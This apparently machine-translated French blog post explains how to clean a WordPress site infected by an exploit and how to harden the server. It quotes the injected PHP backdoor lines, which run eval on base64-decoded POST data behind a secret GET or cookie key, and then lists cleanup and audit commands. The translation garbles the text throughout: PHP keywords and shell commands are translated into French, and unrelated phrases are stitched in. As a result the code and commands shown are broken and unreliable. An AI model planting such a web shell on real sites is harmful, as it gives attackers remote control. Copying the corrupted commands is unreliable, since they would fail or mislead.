WordPress Exploit - le nettoyage des fichiers compromis, et la sécurité de SQL Server.

Avant de lire ce post, vous devriez voir , Pour comprendre quelque chose. :)

J'ai trouvé plusieurs fichiers de blogs sur les codes de stealthsettings.com similaires à celles ci-dessous, provenant de la virusarii avec WordPress exploiter.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'fichier'])); sortie; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcDans le cas ci-dessus est sur le fichier xmlrpc.php à partir de SomnolentMais à un grep serveur, ressemble pas mal de codes de ce genre dans les sources.

pppffiuuu

Nettoyage des fichiers infectés:

Ooookkkk ...
1. La meilleure solution, après avoir fait sauvegardeCPC et base de données nettoyée est de essuyer fichiers SXNUMX Custom Shop Guitars (Wp-config.php et peut conserver les fichiers qui ne se rapportent pas strictement plateforme WP, après avoir soigneusement vérifié) sur le serveur et ne télécharger la version originale 2.5.1 (A cette occasion, faire une version mise à jour wp :)) http://wordpress.org/download/ . Supprimer les fichiers dont le thème, si vous avez confiance que vous pouvez les vérifier attentivement.

Il est évident que les fichiers ont été touchés et les thèmes qui ne sont pas utilisés avant sur le blog et changeant simplement le thème, ne résolvent pas ce problème.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE [ '44e827f9fbeca184'] == "5cd3c94b4b1c57ea") {eval (base64_decode ($ _ POST [ 'fichier'])); sortie; ?}?> <Php get_header (); ?>

2. Rechercher et supprimer tous les fichiers contenant: * _new.php, _old.php * * .jpgg, .giff * * .pngg et le fichier wp-info.txt, le cas échéant.

trouver. -name "* _new.php"
trouver. -name "* _old.php"
trouver. -name "* .jpgg"
trouver. -name "* _giff"
trouver. -name "* _pngg"
trouver. -name "wp-info.txt"

3. dans / Tmp , Rechercher et supprimer des dossiers comme tmpYwbzT2

nettoyage SQL :

1. dans le tableau de la table wp_options voir s'il effacer les lignes: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Aussi wp_options, aller à active_plugins et essuyez s'il y a un plugin qui se termine dans l'une des extensions * _new.php, _old.php * * .jpgg, .giff * * .pngg ou si un autre suspect d'extension, vérifiez soigneusement.

3. table wp_users, Voir s'il y a un utilisateur qui n'a rien écrit dans son droit, la colonne user_nicename. Supprimer cet utilisateur, mais notez le numéro de la colonne ID. Cet utilisateur peut utiliser un «WordPress», comme USER_LOGIN Il est créé et apparaît sur 00: 00: 00 0000-00-00.

4. Allez à la table wp_usermeta et supprimer toutes les lignes appartenant ID ci-dessus.

Après ce qui en fait le nettoyage sql, désactiver puis activer un certain plugin. (Dans son blog -> Tableau de bord -> Plugins)

serveur sécurisé:

1. Voir ce que les répertoires et les fichiers sont "écriture"(Chmod 777) et essayer de mettre sur eux un chmod ce ne serait pas permettre à leur écriture à tous les niveaux. (Chmod 644, par exemple)

trouver. -Permet -2 -ls

2. Voir quels fichiers ont le bit mis suid ou sgid . Si vous ne l'utilisez ces fichiers placent sur eux chmod 0 ou en désinstallant le paquet qu'il contient. Ils sont très dangereux parce qu'ils exécutent des privilèges "Salles de Groupes"Ou"racine"Et pas avec des privilèges normaux de l'utilisateur exécutant le fichier.

find / -type f -ls -Permet -04000
find / -type f -ls -Permet -02000

3. Vérifiez quels ports sont ouverts et essayer de fermer ou de sécuriser ceux qui ne sont pas utilisés.

netstat -an | grep -i écouter

Tellement. Je vois Google Search et d'autres disent "Bien fait pour eux !!!". Bien bien, je l'ai fait ... mais vous savez si google commence à interdire Nouveau formation SE sPAM tuck Trojans (Trojan.Clicker.HTML) Dans les cookies?

WordPress Exploit - le nettoyage des fichiers compromis, et la sécurité de SQL Server.

A propos de l'auteur

infiltration

Passionné par tout ce gadget et Recopie volontiers stealthsettings.com de 2006 et j'aime découvrir de nouvelles choses avec vous sur les ordinateurs et Mac OS, Linux, Windows, iOS et Android.

Commentaire

Laisser un commentaire